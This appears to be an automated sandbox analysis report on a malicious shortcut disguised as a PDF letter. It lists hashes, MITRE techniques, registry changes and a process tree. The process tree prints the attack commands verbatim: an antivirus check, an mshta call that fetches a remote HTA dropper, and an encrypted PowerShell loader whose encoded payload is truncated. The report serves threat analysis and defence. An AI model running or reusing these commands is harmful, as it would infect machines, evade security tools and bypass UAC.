808a15dbb98bcbeedf375303e8250fe10e8f90aa6f83fad083d878ced6a35366

Analysis

max time kernel
87s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
02-02-2023 16:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Letter_Of_Intention.pdf.lnk
Size

2KB
MD5

db8b6e721301ce8d986877d2e9b821b3
SHA1

95babc0e92aed7668b13725c4ad04318f9178a2d
SHA256

808a15dbb98bcbeedf375303e8250fe10e8f90aa6f83fad083d878ced6a35366
SHA512

2348aff088738961863486b8cdac74beae06a27707298050dfffbeaaf2fb3b888c90b5555156b0abff2a4962f5624afa2e6d0ba9ec9f9fddae49f4965eec7227

Score

10^/10

evasion trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://179.43.176.16/intention.hta

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe

Blocklisted process makes network request 3 IoCs

flow	pid	Process
10	3540	mshta.exe
16	428	powershell.exe
23	428	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2060	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 61 IoCs

pid	Process
3636	powershell.exe
3636	powershell.exe
2916	powershell.exe
2916	powershell.exe
4084	powershell.exe
428	powershell.exe
428	powershell.exe
4084	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
2416	powershell.exe
1496	powershell.exe
1496	powershell.exe
4424	powershell.exe
2012	powershell.exe
4424	powershell.exe
2012	powershell.exe
2012	powershell.exe
2012	powershell.exe
2012	powershell.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	3636	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	4084	powershell.exe
Token: SeDebugPrivilege	428	powershell.exe
Token: SeDebugPrivilege	2416	powershell.exe
Token: SeDebugPrivilege	1496	powershell.exe
Token: SeDebugPrivilege	4424	powershell.exe
Token: SeDebugPrivilege	2012	powershell.exe
Token: SeDebugPrivilege	2060	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4824	AcroRd32.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe
4824	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4972 wrote to memory of 2160	4972	cmd.exe	82
PID 4972 wrote to memory of 2160	4972	cmd.exe	82
PID 2160 wrote to memory of 3636	2160	WScript.exe	83
PID 2160 wrote to memory of 3636	2160	WScript.exe	83
PID 3636 wrote to memory of 3540	3636	powershell.exe	85
PID 3636 wrote to memory of 3540	3636	powershell.exe	85
PID 3540 wrote to memory of 2916	3540	mshta.exe	87
PID 3540 wrote to memory of 2916	3540	mshta.exe	87
PID 2916 wrote to memory of 4864	2916	powershell.exe	90
PID 2916 wrote to memory of 4864	2916	powershell.exe	90
PID 4864 wrote to memory of 4084	4864	cmd.exe	91
PID 4864 wrote to memory of 4084	4864	cmd.exe	91
PID 4864 wrote to memory of 428	4864	cmd.exe	92
PID 4864 wrote to memory of 428	4864	cmd.exe	92
PID 428 wrote to memory of 4824	428	powershell.exe	93
PID 428 wrote to memory of 4824	428	powershell.exe	93
PID 428 wrote to memory of 4824	428	powershell.exe	93
PID 428 wrote to memory of 2416	428	powershell.exe	94
PID 428 wrote to memory of 2416	428	powershell.exe	94
PID 2416 wrote to memory of 1100	2416	powershell.exe	95
PID 2416 wrote to memory of 1100	2416	powershell.exe	95
PID 1100 wrote to memory of 3368	1100	csc.exe	96
PID 1100 wrote to memory of 3368	1100	csc.exe	96
PID 2416 wrote to memory of 4436	2416	powershell.exe	97
PID 2416 wrote to memory of 4436	2416	powershell.exe	97
PID 428 wrote to memory of 2012	428	powershell.exe	106
PID 428 wrote to memory of 2012	428	powershell.exe	106
PID 2012 wrote to memory of 2836	2012	powershell.exe	107
PID 2012 wrote to memory of 2836	2012	powershell.exe	107
PID 2836 wrote to memory of 2664	2836	csc.exe	108
PID 2836 wrote to memory of 2664	2836	csc.exe	108
PID 2012 wrote to memory of 812	2012	powershell.exe	112
PID 2012 wrote to memory of 812	2012	powershell.exe	112
PID 4824 wrote to memory of 3620	4824	AcroRd32.exe	113
PID 4824 wrote to memory of 3620	4824	AcroRd32.exe	113
PID 4824 wrote to memory of 3620	4824	AcroRd32.exe	113
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114
PID 3620 wrote to memory of 4820	3620	RdrCEF.exe	114

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Letter_Of_Intention.pdf.lnk
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4972
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Windows\System32\SyncAppvPublishingServer.vbs" l; $F = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($c in $F ){if ($c.displayName -replace 'Windows Defender', ''){Exit}}; .$env:C:\*i*\S*3*\m*ta.e* ('http://179.43.176.16/intention' + '.' + 'hta')
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$env:psmodulepath = [IO.Directory]::GetCurrentDirectory(); import-module AppvClient; Sync-AppvPublishingServer l; $F = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($c in $F ){if ($c.displayName -replace 'Windows Defender', ''){Exit}}; .$env:C:\*i*\S*3*\m*ta.e* ('http://179.43.176.16/intention' + '.' + 'hta')}
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3636
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" http://179.43.176.16/intention.hta
      4⤵
      Blocklisted process makes network request
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:3540
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $dmtaLinr = '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';$btpxR = 'SWpMTGVGS3pWSmhZUUpvQ3BKSXpqekN5WUxhVUFYYnY=';$KnbSwfS = New-Object 'System.Security.Cryptography.AesManaged';$KnbSwfS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$KnbSwfS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$KnbSwfS.BlockSize = 128;$KnbSwfS.KeySize = 256;$KnbSwfS.Key = [System.Convert]::FromBase64String($btpxR);$oYMhb = [System.Convert]::FromBase64String($dmtaLinr);$mPaKTGQP = $oYMhb[0..15];$KnbSwfS.IV = $mPaKTGQP;$FhiroFtFu = $KnbSwfS.CreateDecryptor();$NoTWjrjwZ = $FhiroFtFu.TransformFinalBlock($oYMhb, 16, $oYMhb.Length - 16);$KnbSwfS.Dispose();$OLiGESXm = New-Object System.IO.MemoryStream( , $NoTWjrjwZ );$tKyJMRh = New-Object System.IO.MemoryStream;$zMSCVcgPp = New-Object System.IO.Compression.GzipStream $OLiGESXm, ([IO.Compression.CompressionMode]::Decompress);$zMSCVcgPp.CopyTo( $tKyJMRh );$zMSCVcgPp.Close();$OLiGESXm.Close();[byte[]] $gEHLvCXq = $tKyJMRh.ToArray();$NuGEx = [System.Text.Encoding]::UTF8.GetString($gEHLvCXq);$NuGEx | powershell - }
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2916
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c powershell.exe $dmtaLinr = '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